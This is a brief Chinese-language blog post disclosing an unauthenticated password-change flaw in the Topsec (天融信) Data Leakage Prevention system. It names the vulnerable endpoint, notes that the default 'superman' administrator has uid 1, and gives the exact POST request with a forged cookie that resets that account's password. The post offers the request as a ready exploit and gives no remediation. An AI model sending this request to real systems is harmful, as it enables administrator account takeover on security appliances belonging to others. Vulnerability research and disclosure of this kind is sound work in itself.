Posted 2020-09-13Updated 2021-03-03Updated 2021-03-03WEB安全a few seconds read (About 86 words)0 visits天融信数据防泄漏系统越权修改管理员密码无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。 POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1 天融信数据防泄漏系统越权修改管理员密码http://www.ol4three.com/2020/09/13/WEB/Exploit/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E6%95%B0%E6%8D%AE%E9%98%B2%E6%B3%84%E6%BC%8F%E7%B3%BB%E7%BB%9F%E8%B6%8A%E6%9D%83%E4%BF%AE%E6%94%B9%E7%AE%A1%E7%90%86%E5%91%98%E5%AF%86%E7%A0%81/Authorol4threePosted on2020-09-13Updated on2021-03-03Licensed under 天融信